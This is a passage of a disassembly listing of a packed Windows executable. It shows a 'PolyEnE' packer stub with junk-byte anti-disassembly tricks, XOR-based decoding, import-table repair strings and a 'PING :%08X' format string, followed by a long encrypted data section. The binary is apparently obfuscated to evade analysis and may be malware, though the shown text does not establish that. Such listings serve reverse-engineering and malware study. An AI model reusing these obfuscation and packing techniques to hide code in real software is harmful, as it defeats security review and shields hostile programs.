add ah, bl
retf
; ---------------------------------------------------------------------------
inc ecx
add al, dl
retf
; ---------------------------------------------------------------------------
dw 41h
dd offset dword_41CC14
align 10h
dword_41DA70 dd 0AED0C3E0h, 9DADB3BCh, 2 dup(0) ; DATA XREF: sub_40D043:loc_40D31F�o
; sub_40D871:loc_40DCB8�o
dword_41DA80 dd 6B6F6B23h, 32h, 1Eh dup(0) ; DATA XREF: sub_40332B+1A1�o
; sub_4093B6+6C�o ...
byte_41DB00 db 0FCh ; DATA XREF: sub_40D043+28C�r
; sub_40D043+297�o
db 8Bh, 8Eh, 0E6h
dd 0E2h, 1Eh dup(0)
byte_41DB80 db 0 ; DATA XREF: sub_40D043+2B3�r
; sub_40D043+2BE�o
align 4
dd 1Fh dup(0)
dword_41DC00 dd 3430032Eh, 2036202h, 0 ; DATA XREF: sub_40A9CF:loc_40C4DA�o
; sub_40D871+242�o
dword_41DC0C dd 0F28D99A8h, 8CA0BFEFh, 84E0B1h, 3Eh dup(0) ; DATA XREF: sub_406A23+2E�o
; sub_406AE7+2E�o
dword_41DD10 dd 0FE87BCF5h, 0C7FCA2ECh, 0A1h, 0 ; DATA XREF: .data:off_41DA38�o
dword_41DD20 dd 3430032Dh, 62656402h, 2036775h ; DATA XREF: .data:00416B0D�o
aEipHasLeftTheE db '- eip has left the endless loop for some reason...',0
align 10h
aEntry db 'entry',0 ; DATA XREF: .data:00416AE7�o
align 4
aLoop db 'loop',0 ; DATA XREF: .data:loc_416AC5�o
align 10h
aPing08x db 'PING :%08X',0 ; DATA XREF: sub_4167F1+263�o
align 4
a08xX08x3x08x08 db '%08x%x%08x%3x%08x%08x',0 ; DATA XREF: sub_4167F1+5A�o
align 10h
dword_41DDA0 dd 0DF0B3D60h, 101B548Fh, 8658Eh, 19D12B2Bh ; DATA XREF: sub_416E4E+15�o
off_41DDB0 dd offset off_4172BC ; DATA XREF: .data:off_4172C0�o
; .data:004172FC�o ...
align 8
a_?av_com_error db '.?AV_com_error@@',0
align 10h
off_41DDD0 dd offset off_4172BC ; DATA XREF: .data:off_417308�o
; .data:00417344�o
align 8
a_?avtype_info@ db '.?AVtype_info@@',0
dword_41DDE8 dd 0 ; DATA XREF: sub_401856:loc_40186E�r
; sub_401856+21�r ...
dword_41DDEC dd 0 ; DATA XREF: sub_401856:loc_401883�r
; sub_401856+36�r ...
dword_41DDF0 dd 0 ; DATA XREF: sub_401856:loc_401898�r
; sub_401856+4B�r ...
dword_41DDF4 dd 0 ; DATA XREF: sub_401856+3�r
; sub_401856+C�r ...
dd 0
dword_41DDFC dd 0 ; DATA XREF: sub_4018AF+40�r
; sub_4018AF+62�r ...
byte_41DE00 db 0 ; DATA XREF: sub_401981+1BA�o
; sub_402A32+57�r ...
align 8
dword_41DE08 dd 0 ; DATA XREF: sub_40332B+1A�r
; sub_404CBB+1B�r ...
dword_41DE0C dd 1 ; DATA XREF: sub_40332B+B�o
dword_41DE10 dd 77E7C706h ; DATA XREF: sub_403BD3+28�w
; sub_409C36+12�r ...
align 8
dword_41DE18 dd 71C245E0h ; DATA XREF: sub_403BD3+53�w
dword_41DE1C dd 71C243F6h ; DATA XREF: sub_403BD3+66�w
dword_41DE20 dd 71C59904h ; DATA XREF: sub_403BD3+79�w
dword_41DE24 dd 71C453F8h ; DATA XREF: sub_403BD3+8C�w
dword_41DE28 dd 71C2FA86h ; DATA XREF: sub_403BD3+9F�w
dword_41DE2C dd 71C574FAh ; DATA XREF: sub_403BD3+B2�w
dword_41DE30 dd 71C214BAh ; DATA XREF: sub_403BD3+C5�w
dword_41DE34 dd 71C4A1B4h ; DATA XREF: sub_403BD3+D8�w
dword_41DE38 dd 71C59530h ; DATA XREF: sub_403BD3+EB�w
dword_41DE3C dd 71B2ACCBh ; DATA XREF: sub_403BD3+112�w
dword_41DE40 dd 71B22C25h ; DATA XREF: sub_403BD3+125�w
dword_41DE44 dd 71B2A381h ; DATA XREF: sub_403BD3+138�w
dword_41DE48 dd 71B28D0Dh ; DATA XREF: sub_403BD3+14B�w
dword_41DE4C dd 7622A3F4h ; DATA XREF: sub_403BD3+219�w
; sub_408B30+118�r ...
dword_41DE50 dd 5E0C4E7Dh ; DATA XREF: sub_403BD3+1F2�w
; sub_414EF4+6C�r ...
dword_41DE54 dd 71AB33DFh ; DATA XREF: sub_403BD3+16C�w
; sub_403BD3+197�r ...
dword_41DE58 dd 71ABC076h ; DATA XREF: sub_4020C2+DB�r
; sub_403BD3+17F�w ...
dword_41DE5C dd 71AB3A2Ch ; DATA XREF: sub_403BD3+192�w
; sub_403BD3+1A9�r ...
dd 101h dup(0)
dword_41E264 dd 0 ; DATA XREF: sub_4042FB+3�r
; sub_4042FB+20�o
dword_41E268 dd 0 ; DATA XREF: sub_4042FB+12�o
; sub_4042FB:loc_404327�r
align 10h
dword_41E270 dd 76BF1C22h ; DATA XREF: sub_405FA3+46�w
; sub_405FA3+7A�r ...
dword_41E274 dd 76BF1D54h ; DATA XREF: sub_405FA3+59�w
; sub_405FA3+83�r ...
dword_41E278 dd 76BF1E6Ch ; DATA XREF: sub_405FA3+6C�w
; sub_405FA3+8C�r ...
dword_41E27C dd 76BF32DDh ; DATA XREF: sub_405FA3+33�w
; sub_405FA3+71�r ...
dword_41E280 dd 14ABB8h, 0FFFFFFFFh, 5 dup(0) ; DATA XREF: sub_405FA3+4�o
; sub_406041+B�o ...
byte_41E29C db 1 ; DATA XREF: sub_405FA3+95�w
; sub_406041+16�r
align 10h
dword_41E2A0 dd 0 ; DATA XREF: sub_409226+61�w
; sub_409226+77�w ...
align 8
dword_41E2A8 dd 14ABE0h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: sub_40938F+1A�o
; sub_4095A4+6�o ...
dword_41E2C0 dd 0 ; DATA XREF: sub_40938F+3�w
; sub_4095A4+11�r ...
align 8
dword_41E2C8 dd 863A00h ; DATA XREF: sub_40938F+15�w
; sub_4095A4+57�r ...
dword_41E2CC dd 0 ; DATA XREF: sub_409CB1+6�r
; sub_409DD0+65�w ...
dword_41E2D0 dd 0 ; DATA XREF: sub_409DD0+3F�w
; sub_409DD0+44�r ...
dword_41E2D4 dd 0 ; DATA XREF: sub_409CB1+F6�r
; sub_409DD0+91�w ...
dword_41E2D8 dd 0 ; DATA XREF: sub_409CB1+B9�r
; sub_409DD0+7B�w ...
align 10h
byte_41E2E0 db 0 ; DATA XREF: sub_409DD0+29�r
; sub_409DD0+96�w
align 4
dd 101h dup(0)
byte_41E6E8 db 0 ; DATA XREF: sub_40CF2F+4B�o
; sub_40CF2F+5E�o ...
align 4
dd 5Fh dup(0)
dword_41E868 dd 40h dup(0) ; DATA XREF: sub_40CF2F+E�o
; sub_40CF2F+A6�o ...
dword_41E968 dd 3 dup(0) ; DATA XREF: sub_40CF2F+23�o
; sub_40CF2F+36�o ...
dword_41E974 dd 0 ; DATA XREF: sub_40CF25+3�r
; sub_40D366+15�r ...
dd 0
dword_41E97C dd 0 ; DATA XREF: sub_40E618+49�w
; sub_40E618:loc_40E66D�w
byte_41E980 db 0 ; DATA XREF: sub_40E979+1D�w
; sub_40E979+46�w ...
align 4
dd 9 dup(0)
dd 3E000000h, 3F000000h, 37363534h, 3B3A3938h, 3D3Ch, 0
dd 2010000h, 6050403h, 0A090807h, 0E0D0C0Bh, 1211100Fh
dd 16151413h, 191817h, 0
db 0
db 1Ah, 1Bh, 1Ch
db 1Dh
db 1Eh, 1Fh, 20h
a_0123 db '!"#$%&',27h,'()*+,-./0123',0
dd 22h dup(0)
byte_41EA84 db 0AFh ; DATA XREF: sub_40ECEB+29�o
; sub_40ECEB+35�o ...
db 0CFh, 0F7h, 22h
dd 8848C018h, 0B368C8BAh, 0C033A9h, 0
dword_41EA98 dd 778BADEBh, 11714D53h, 0C9854DFFh, 55D567CFh, 0
; DATA XREF: sub_40ED6E+29�o
; sub_40ED6E+35�o ...
dword_41EAAC dd 0A81E6150h ; DATA XREF: sub_4102AE+1D�o
; sub_410318+7�w ...
dword_41EAB0 dd 702A1198h ; DATA XREF: sub_4102AE+2D�o
; sub_410318+11�w ...
dword_41EAB4 dd 0A9EFAA6Eh ; DATA XREF: sub_4102AE+3D�o
; sub_410318+1B�w ...
dword_41EAB8 dd 0DB5B6980h ; DATA XREF: sub_4102AE+4D�o
; sub_410318+25�w ...
align 10h
byte_41EAC0 db 0DFh ; DATA XREF: sub_41055F+29�o
; sub_41055F+35�o ...
db 0FCh, 0EFh, 91h
dd 0A2928C83h, 0CEE88CD5h, 80C099CDh, 2 dup(0)
dword_41EAD8 dd 2 dup(0) ; DATA XREF: sub_41113B+7E8�o
dword_41EAE0 dd 0 ; DATA XREF: sub_411DC5+557�o
dword_41EAE4 dd 2 dup(0) ; DATA XREF: sub_411DC5+579�o
dword_41EAEC dd 0 ; DATA XREF: sub_4127D0+9�r
; sub_4127D0+16�w
dword_41EAF0 dd 0 ; DATA XREF: sub_4127D0+BF�w
; sub_4127D0:loc_4128A0�r
dword_41EAF4 dd 2 dup(0) ; DATA XREF: sub_412D4C+3�o
; sub_412E04+7F�o
dword_41EAFC dd 6B636170h, 652E6465h, 6578h, 3Eh dup(0) ; DATA XREF: sub_406E8E+208�o
; sub_407148+172�o ...
dword_41EC00 dd 0F63C7758h ; DATA XREF: sub_40A9CF+838�r
; sub_4167F1+118�w
dword_41EC04 dd 0EF9CCFA7h ; DATA XREF: sub_4167F1+122�w
dword_41EC08 dd 0A8FD3E3Ah ; DATA XREF: sub_4167F1+12C�w
dword_41EC0C dd 727BDAAEh ; DATA XREF: sub_4167F1+136�w
dword_41EC10 dd 6B636170h, 652E6465h, 6578h, 3Fh dup(0) ; DATA XREF: sub_40A9CF+C3D�o
; sub_40A9CF+C51�o ...
dword_41ED18 dd 40h dup(0) ; DATA XREF: sub_40A9CF+1082�o
; sub_40A9CF+108E�o ...
byte_41EE18 db 0 ; DATA XREF: sub_40D043+FF�r
; sub_40D043+10A�o ...
align 4
dd 1Fh dup(0)
byte_41EE98 db 0 ; DATA XREF: sub_403DF3:loc_403F07�r
; sub_403DF3+11F�o ...
align 4
dd 1Fh dup(0)
dword_41EF18 dd 40h dup(0) ; DATA XREF: sub_404279+36�o
; sub_4055E5+746�o ...
byte_41F018 db 0 ; DATA XREF: sub_40A9CF+1F37�o
; sub_40D043:loc_40D0D6�r ...
align 4
dd 3F9h dup(0)
; ---------------------------------------------------------------------------
pusha
sub esp, 4
mov dword ptr [esp], 0A867h
pop eax
xchg al, ah
jmp short loc_420011
; ---------------------------------------------------------------------------
db 0A0h
; ---------------------------------------------------------------------------
loc_420011: ; CODE XREF: .data:0042000E�j
rol ax, 8
push 40h
mov ecx, [esp]
add esp, 4
push eax
push ecx
dec eax
inc eax
jmp short near ptr loc_420026+1 ; CODE XREF: .data:loc_420026�j
; ---------------------------------------------------------------------------
dd 42051515h, 0F0FFEB00h, 1EBC486h, 0C0C166A0h, 0A901EB08h
dd 0EC835E50h, 2404C704h, 401000h, 57C7335Bh, 30BD02EBh
dd 5F240433h, 1EBDB87h, 0A8676831h, 0C8B0000h, 4C48324h
dd 0C8C0038Ah, 0C8006Bh, 47E880C8h, 20EC0C0h, 0EEC080C1h
dd 0F698C080h, 69F082D0h, 0C099E882h, 0C080B9C8h, 8AF0805Ch
dd 82A5F080h, 0C08292E8h, 60F082B2h, 90430688h, 0C102C2C1h
dd 0C6FF02CAh, 83C9FFEBh, 850F00F9h, 0FFFFFFB4h, 0F6FFEB5Eh
dd 875FF78Bh, 4EC83F7h, 2404C7h, 5F004010h, 5EBF6FFh, 3EB230Fh
dd 0EBFBEB31h, 57BB800h, 0D0FF0042h, 1915FFEBh, 68004205h
dd 6B5h, 8324048Bh, 0C73304C4h, 0BD02EB57h, 24043330h
dd 40B8505Fh, 91000000h, 0FFEB5058h, 15FFEBF1h, 420515h
dd 0F0FFDB87h, 1E850h, 58C70000h, 0EB08C083h, 8758E0FFh
dd 0EBF0FFC9h, 0EB230F05h, 0FBEB3103h, 0EBC0FFEBh, 4444C8FFh
dd 0FE244C8Bh, 0FFEB4444h, 0C8FFEBC0h, 0C704EC83h, 70002404h
dd 68580041h, 6B5h, 8ADB875Ah, 0C0D72838h, 0FA3220CFh
dd 8259CFC0h, 0EF82E0EFh, 80FA0201h, 0C78208F7h, 0F7CFC01Fh
dd 0C782FA32h, 77F78201h, 808FEF80h, 0FA02FFEFh, 88D2EF80h
dd 20C6C139h, 0C4864048h, 66A001EBh, 4008C0C1h, 0C987C1FFh
dd 0FA83CAFFh, 0B0850F00h, 8BFFFFFFh, 0C4832434h, 4EC8304h
dd 2404C7h, 5F004170h, 1EBC486h, 0C0C166A0h, 57C73308h
dd 30BD02EBh, 5F240433h, 0B8F6FFEBh, 42057Bh, 0C733D0FFh
dd 0BD02EB57h, 24043330h, 15FFEB5Fh, 420519h, 2A34B8h
dd 0C100EB00h, 406820C6h, 59000000h, 0FFF0FFEBh, 15FFEBF1h
dd 420515h, 0FFEBF0FFh, 8B4444F0h, 44FE245Ch, 0A901EB44h
dd 0EC83D287h, 2404C704h, 418000h, 0C0FFEB5Dh, 0EBC8FFEBh
dd 0EB230F05h, 0FBEB3103h, 2A34BD55h, 5D950000h, 558A90h
dd 0EA80D032h, 90F2808Ch, 3277EA82h, 80D02AD0h, 0EA80BEEAh
dd 0C0C280FFh, 1388D032h, 0EBFB8757h, 875B0F01h, 0C5FFEBFBh
dd 48C3FFEBh, 0EBC0FFEBh, 0F883C8FFh, 0C2850F00h, 44FFFFFFh
dd 24748B44h, 0EB4444FEh, 80006800h, 3C8B0041h, 4C48324h
dd 4EC8356h, 7B2404C7h, 58004205h, 0E850D0FFh, 1, 0C08358C7h
dd 0E0FFEB08h, 15FFEB58h, 420519h, 0B85000EBh, 4173C8h
dd 0F8895897h, 0EB57C733h, 3330BD02h, 835F2404h, 4C704ECh
dd 524h, 0BB5900h, 0EB000000h, 0EB230F05h, 0FBEB3103h
dd 850F1839h, 29h, 0BA5200EBh, 4, 0C22BDAF7h, 0FB87575Ah
dd 5B0F01EBh, 0C9FFFB87h, 840FD939h, 106h, 0FFFFD3E9h
dd 1EB85FFh, 0FB875731h, 5B0F01EBh, 0EC83FB87h, 2404C704h
dd 400000h, 0C478B5Bh, 0F0FFC303h, 0EBFB8757h, 875B0F01h
dd 1E850FBh, 0C7000000h, 8C08358h, 58E0FFEBh, 0EB6901EBh
dd 51D15FFh, 0C6890042h, 8710478Bh, 87D803C9h, 68038BD2h
dd 0
; ---------------------------------------------------------------------------
mov ecx, [esp]
add esp, 4
jmp short $+2
xchg al, ah
jmp short loc_420365
; ---------------------------------------------------------------------------
db 0A0h
; ---------------------------------------------------------------------------
loc_420365: ; CODE XREF: .data:00420362�j
rol ax, 8
jmp short loc_42036C
; ---------------------------------------------------------------------------
db 69h
; ---------------------------------------------------------------------------
loc_42036C: ; CODE XREF: .data:00420369�j
cmp eax, ecx
jz loc_4203FA
dec eax
inc eax
test eax, 80000000h
jnz loc_42039E
jmp short loc_420388
; ---------------------------------------------------------------------------
db 0Fh
db 23h
; ---------------------------------------------------------------------------
loc_420385: ; CODE XREF: .data:loc_420388�j
jmp short loc_42038A
; ---------------------------------------------------------------------------
db 31h
; ---------------------------------------------------------------------------
loc_420388: ; CODE XREF: .data:00420381�j
jmp short loc_420385
; ---------------------------------------------------------------------------
loc_42038A: ; CODE XREF: .data:loc_420385�j
jmp short $+2
push edx
mov edx, 400000h
add eax, edx
pop edx
inc eax
inc eax
jmp loc_4203B4
; ---------------------------------------------------------------------------
inc esi
loc_42039E: ; CODE XREF: .data:0042037B�j
push eax
call near ptr loc_4203A4+1
loc_4203A4: ; CODE XREF: .data:0042039F�p
mov dword ptr [eax-7Dh], 0FFEB08C0h
loopne loc_420405
and eax, 0FFFFh
xchg ecx, ecx
loc_4203B4: ; CODE XREF: .data:00420398�j
push eax
push esi
jmp short near ptr loc_4203B7+1 ; CODE XREF: .data:loc_4203B7�j
; ---------------------------------------------------------------------------
adc eax, offset byte_420521
jmp short loc_4203C1
; ---------------------------------------------------------------------------
db 69h
; ---------------------------------------------------------------------------
loc_4203C1: ; CODE XREF: .data:004203BE�j
push eax
mov eax, 0
xchg eax, ecx
pop eax
xor eax, edi
push edi
jmp short loc_4203D0
; ---------------------------------------------------------------------------
dw 30BDh
; ---------------------------------------------------------------------------
loc_4203D0: ; CODE XREF: .data:004203CC�j
xor eax, [esp]
pop edi
cmp ecx, eax
jz loc_420442
rol esi, 20h
jmp short near ptr loc_4203DF+1 ; CODE XREF: .data:loc_4203DF�j
; ---------------------------------------------------------------------------
db 0F6h, 8Bh, 0F7h
dd 89F7875Fh, 4BA5203h, 3000000h, 58E95ADAh, 88FFFFFFh
db 87h, 0D2h
; ---------------------------------------------------------------------------
loc_4203FA: ; CODE XREF: .data:0042036E�j
add edi, 14h
jmp near ptr dword_420028+28Ah
; ---------------------------------------------------------------------------
loc_420405: ; CODE XREF: .data:004203AB�j
mov ch, 61h
push eax
call near ptr loc_42040D+1
loc_42040D: ; CODE XREF: .data:00420408�p
mov dword ptr [eax-7Dh], 0FFEB08C0h
loopne loc_42046E
push edi
xchg edi, ebx
jmp short loc_42041C
; ---------------------------------------------------------------------------
db 0Fh
; ---------------------------------------------------------------------------
loc_42041C: ; CODE XREF: .data:00420419�j
pop ebx
xchg edi, ebx
rol edx, 2
ror edx, 2
push edi
xchg edi, ebx
jmp short loc_42042B
; ---------------------------------------------------------------------------
db 0Fh
; ---------------------------------------------------------------------------
loc_42042B: ; CODE XREF: .data:00420428�j
pop ebx
xchg edi, ebx
push offset sub_4167F1
mov eax, [esp]
add esp, 4
jmp short near ptr loc_420439+1 ; CODE XREF: .data:loc_420439�j
; ---------------------------------------------------------------------------
db 0F0h
; ---------------------------------------------------------------------------
jmp short loc_42043F
; ---------------------------------------------------------------------------
db 69h
; ---------------------------------------------------------------------------
loc_42043F: ; CODE XREF: .data:0042043C�j
xchg edx, edx
retn
; ---------------------------------------------------------------------------
loc_420442: ; CODE XREF: .data:004203D6�j
push edi
xchg edi, ebx
jmp short loc_420448
; ---------------------------------------------------------------------------
db 0Fh
; ---------------------------------------------------------------------------
loc_420448: ; CODE XREF: .data:00420445�j
pop ebx
xchg edi, ebx
push ebp
mov ebp, offset aUnableToFixImp ; "Unable to fix importtable."
xchg eax, ebp
pop ebp
xchg ecx, ecx
xchg ecx, ecx
push eax
mov eax, offset aPolyene ; "PolyEnE"
xchg eax, ebx
pop eax
push ecx
push 10h
pop edx
xor eax, edi
push edi
jmp short loc_42046E
; ---------------------------------------------------------------------------
db 0BDh, 30h
; ---------------------------------------------------------------------------
loc_42046E: ; CODE XREF: .data:00420414�j
; .data:0042046A�j
xor eax, [esp]
pop edi
push edx
xchg ecx, ecx
jmp short near ptr loc_420476+1 ; CODE XREF: .data:loc_420476�j
; ---------------------------------------------------------------------------
dd 0F6FFEBF3h, 875FF78Bh, 0FF4048F7h, 1E850F0h, 0C7000000h
dd 8C08358h, 58E0FFEBh, 0C1F1FFEBh, 0CAC102C2h, 0F6FFEB02h
dd 875FF78Bh, 0EBD287F7h, 0FB875700h, 5B0F01EBh, 5C68FB87h
dd 58004206h, 0EB50C987h, 51D15FFh, 50680042h, 59004206h
dd 0EBF0FF51h, 52115FFh, 0D0FF0042h, 2515FFEBh, 0E9004205h
dd 96h, 0
dd 0CDC31337h, 77E60000h, 20508h, 20515h, 5 dup(0)
dd 4E52454Bh, 32334C45h, 6C6C642Eh, 0E736A300h, 0E7380377h
dd 0E805D877h
db 77h
byte_420521 db 0FDh, 0A5h, 0E7h ; DATA XREF: .data:004203B9�o
dd 0E75CB577h, 77h, 47016800h, 61626F6Ch, 6C6C416Ch, 6F00636Fh
dd 6F6C4701h, 466C6162h, 656572h, 6F4C01A9h, 694C6461h
dd 72617262h, 29004179h, 74654701h, 636F7250h, 72646441h
dd 737365h, 78450075h, 72507469h, 7365636Fh, 0B0E90073h
dd 55000000h, 33DF8B57h, 831E03EDh, 8B6608C6h, 46CD8B16h
dd 0B6EAD366h, 74CEFE09h, 73E2D0F1h, 0CD8B5676h, 0E8D3068Bh
dd 0F08BC88Bh, 0A903E9C1h, 4, 0E1830B74h, 8E8C11Fh, 0EB08C583h
dd 3E18309h, 8305E8C1h, 0E68305C5h, 74F68503h, 15744E0Eh
dd 831C744Eh, 0C5831FE0h, 251AEB05h, 3FFFh, 0EB0EC583h
dd 3FF2510h, 0C5830000h, 8306EB0Ah, 0C5837FE0h, 0F78B4007h
dd 2B02C183h, 39048DF0h, 2373C33Bh, 0CD8BA4F3h, 3E9C15Eh
dd 307E583h, 3B82EBF1h, 8B1173FBh, 47068BCDh, 8846E8D3h
dd 6EE9FF47h, 59FFFFFFh, 2B5FC78Bh, 0EBC35DC7h
db 3Ah
aUnableToFixImp db 'Unable to fix importtable.',0 ; DATA XREF: .data:0042044C�o
aPolyene db 'PolyEnE',0 ; DATA XREF: .data:00420458�o
aMessageboxa db 'MessageBoxA',0
aUser32_dll db 'USER32.dll',0
align 1000h
_data ends
; Section 2. (virtual address 00021000)
; Virtual size : 0000E09B ( 57499.)
; Section size in file : 0000E09B ( 57499.)
; Offset to raw data for section: 00021000
; Flags C0000020: Text Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write
_pdata segment para public 'CODE' use32
assume cs:_pdata
;org 421000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
asc_421000: ; DATA XREF: .ex_cod:off_431820�o
unicode 0, <^>
dw 8000h
dd 0A4250000h, 52B76DDAh, 892EC50Ch, 387E6E8Ah, 18F6D23Ch
dd 990ABCA4h, 23CE1F70h, 2EB879D9h, 584BFA61h, 83F17B84h
dd 81B5B861h, 70B8AF1h, 77A9C24h, 325D6AF2h, 33E41FEAh
dd 146BE70h, 0EAF98D39h, 20659A96h, 383869FCh, 644BB132h
dd 343E7B2Ch, 575EB6F2h, 0D65CE687h, 53116621h, 562F2ACCh
dd 1286342Bh, 0A2EE7B53h, 7B66AB50h, 0ABB36779h, 3049FEBCh
dd 0A37EE21h, 0D468DC64h, 235FD6C8h, 56034D6Ch, 86FFA238h
dd 0E5D3EBCAh, 7DD42CF3h, 21E022EAh, 8EDD0174h, 0E535F008h
dd 0DAB30627h, 6AF78738h, 700AC0C7h, 0E61E62C6h, 749F80CAh
dd 0C535F1D9h, 0DDFEF3D7h, 0BC8DF75Dh, 95CF6E0Eh, 2E13CCDCh
dd 30325460h, 8A54BF4Fh, 10DCDBD6h, 9642F702h, 0D99AA977h
dd 1981241Ah, 77F1D223h, 44234DDBh, 4E65251Ah, 5E09050Fh
dd 0C2543938h, 0A037D5F8h, 0DD09A037h, 119EBB3Dh, 0BD98FA23h
dd 34168533h, 9E11669Eh, 0B906DB33h, 71E95695h, 0E0510946h
dd 56B19252h, 0DFE7F7DFh, 2A48A71Eh, 0AF7B1F1Bh, 5979B633h
dd 7F250118h, 1AD9CCD0h, 65780B70h, 6CED3015h, 0C6F48A53h
dd 0E414835Eh, 37EF448Fh, 0EC5D47BCh, 0AADCE935h, 719B46Eh
dd 0AC2DC4Ch, 53E7DEDCh, 1587AC5Bh, 0F70EFAA8h, 36EE12A2h
dd 3251ABBEh, 5A3E580h, 0C5C13CFDh, 0AF396B8Dh, 0BC9096B9h
dd 0E4D1D668h, 3C9DEA6Dh, 0FBA78AAh, 1581B38Bh, 88A4781Bh
dd 0EB7A70FFh, 0FABEBE4Ah, 66F65366h, 4622200Dh, 0F04AE6ABh
dd 97582656h, 0E5C45C04h, 79518555h, 89A21E5Eh, 3AAB1F73h
dd 1A0BE78Ch, 94D1AF2Bh, 48018581h, 0BD25794Bh, 32B465B2h
dd 0CB85BCF5h, 5BE7B35Ch, 2852C74Bh, 0B190C41Ch, 4B194CB7h
dd 300F86CFh, 980DEB36h, 4E51FA0Eh, 430DCBA1h, 3E86F8AEh
dd 1F63328Eh, 19F0C40Ah, 0DBD00E3Ah, 0CC6AD9AFh, 8B30C024h
dd 3F52E7E1h, 3B335A56h, 0FC653544h, 0FC048417h, 17F10D3Bh
dd 1C9A9F54h, 0B8751516h, 0FFADF7B7h, 187CC200h, 0B700DBFFh
dd 943A07F0h, 0B33E331Ah, 0C419EFBBh, 7FBDAF12h, 0BF7D282Eh
dd 37F596EDh, 88051DAAh, 0E4406A31h, 3490169Ch, 81670731h
dd 0C5B7611Dh, 0BFAF3ED0h, 0F83F0ECAh, 70913CD1h, 2CE729E8h
dd 0CEBBC70Bh, 547FCB76h, 0FE995E40h, 8778AA9Ch, 1D268A23h
dd 0ADEA6112h, 7F06E11Ah, 85E43C2Ah, 5D87514Fh, 0E23E2D2Eh
dd 32888356h, 0C4E6E9C4h, 0EEFA4CF1h, 10F375CBh, 255F7C19h
dd 5902EB2Eh, 69AF017Bh, 9F1B19FAh, 38924EE2h, 37D00E61h
dd 3C906140h, 0F5ED2DFEh, 74C6EFFBh, 0B703DFA3h, 5BBC0CC4h
dd 717D0D70h, 0BF6BEEEEh, 0F2BF6D5Eh, 7DB887E4h, 0C2E7C706h
dd 0DFD70F4h, 0C2F14CF9h, 0D927C7Bh, 0D41D0944h, 208B7D86h
dd 0B4CD03B9h, 1DE2155Bh, 225D1DF0h, 0BC9B30F2h, 7B16BE28h
dd 4B5299F2h, 0E6469C96h, 19B32CF2h, 0D9EFCE88h, 785975B1h
dd 0AD9E5089h, 4823EE59h, 3B0CBAC5h, 94E9C9Eh, 0E249F34Bh
dd 39D21360h, 5DA08DCFh, 187AE55Ch, 0E1317165h, 357E0DAEh
dd 45778894h, 877BAEBCh, 85DC7202h, 7B4F942h, 0A48CB7F3h
dd 0C50D3561h, 6C388F7Ah, 0F6EE435h, 8718E8DBh, 5F922A58h
dd 51BDF818h, 17435690h, 0ECF3D396h, 9243221h, 0DD470238h
dd 2CC38E41h, 7EC126F2h, 309983A2h, 8309CE7Bh, 0E696638Ah
dd 9671394Dh, 895A9CE1h, 6089848Dh, 0BF1D945Eh, 1D98FD34h
dd 8EE9215Dh, 4F5CA0A3h, 0AB0E2620h, 4A787A30h, 30E66E72h
dd 3A10D46Ch, 0E612DAE0h, 0B0DF8AEEh, 294DEA72h, 2A1E5533h
dd 5ABE951Ch, 7DC6FD29h, 6207BF51h, 0E83735CEh, 7F1E421Fh
dd 0C2994C6Eh, 28F82582h, 2B63C0C1h, 6D2CCD2Bh, 4811A80Fh
dd 0D72BFA15h, 6E82DDFCh, 9B4C6879h, 0AF263564h, 37414F28h
dd 168DAD20h, 0CEC89F6Ch, 0F7D553AEh, 0BBB8E69Ch, 0C37A477Ah
dd 747684Dh, 0D2880F3Dh, 0FFE60F68h, 17810307h, 0CCFA238Ch
dd 9BCA900Ah, 7DAA38F1h, 18F4E4D2h, 82304349h, 0D32A3570h
dd 4F959565h, 2C2D7581h, 0BBE2A01Ch, 0A4CCF591h, 0D472F18h
dd 729C49BDh, 0F42DC2C6h, 3716367h, 7F68380Ch, 68D6D151h
dd 0D048F1B0h, 44D73D62h, 7ABE7628h, 883C1359h, 7D952735h
dd 62006F76h, 0EA18153Bh, 26CB6FFFh, 81720F78h, 9858F447h
dd 6F89E556h, 99D215F4h, 0B0FA371Bh, 730958EAh, 69CF696Fh
dd 0A38B24BDh, 3B56301Dh, 7452709Eh, 0B3F7D066h, 10CEBB28h
dd 77F04655h, 4B2FE71Fh, 0CA342EF7h, 767940F8h, 3410A424h
dd 0A3108E7Dh, 0BD07CE7Ch, 0F3FD8890h, 6038BC81h, 0BC4ECD00h
dd 8AE01B76h, 0E80A8795h, 25D628D0h, 0D96E6C11h, 0C2A7103Ah
dd 3F5B6605h, 561B9E5Bh, 2F6E70FEh, 0F95EBB8Dh, 8BABF4CDh
dd 96C09276h, 907F12FCh, 7BFA6398h, 4B2D73E9h, 0D6867EEh
dd 7271E71Eh, 59BDFEA0h, 0FFBB73DFh, 0E5EEA10Ah, 7C025386h
dd 299ABEF1h, 91471DDFh, 7018815h, 81CDC40Fh, 0DA368613h
dd 7B34A23Ah, 94B413BDh, 0E47F769Eh, 0B092AF4Fh, 5ED264DBh
dd 1913C571h, 0D528CE02h, 23778DDFh, 3506163Fh, 25B4429Eh
dd 66B91C5h, 40F7715Dh, 5651B52Ah, 883854B1h, 0C160AFCAh
dd 72A2DC90h, 66B348Ah, 19CEC229h, 0BB2A48F8h, 0EE8B4968h
dd 3BC46269h, 0A513687Fh, 0AF8658F5h, 0DAD9A9DDh, 0B756B442h
dd 7EF1A4B6h, 2FE74B2Dh, 139B03BEh, 7F27C195h, 42358284h
dd 0D31CBC60h, 5502CCDCh, 0FE02C23Fh, 2997FA22h, 0BB625205h
dd 52ED4662h, 0F0E5F813h, 822D3792h, 6EE3A175h, 0C9231D02h
dd 0E1AAEF3Ah, 29FEC0A1h, 0E5ADA18Eh, 0EB55B6B0h, 0ACBF141h
dd 0D9812206h, 8E15D35h, 2C0B1294h, 4B84CD8Bh, 9A0E23C7h
dd 12147C92h, 3FE2210Dh, 78B95E14h, 2AD7973Ch, 0C6E8E84Fh
dd 7E112170h, 9E845029h, 0C2A273E4h, 26B590D2h, 0C4756008h
dd 1B28A53Bh, 0A8C97414h, 0F1974CCAh, 47476F4h, 0D8DA2D01h
dd 7039AC1Bh, 0E6C75AC5h, 0AA25C158h, 78921FB8h, 75BBB04Ch
dd 89F1BDF6h, 0E19F880Eh, 0AD37C60Dh, 0FD5B9D02h, 5E7F8E51h
dd 6A2D1C13h, 54724A26h, 1CF72708h, 2575928Fh, 0DE9B42Fh
dd 0E7219552h, 13E66546h, 0AD25678Ah, 0CF65B5D4h, 0DAB65ED1h
dd 37A02632h, 16B50E9Ch, 0C9C7817Ch, 0EC39C7BBh, 0CC20FAEDh
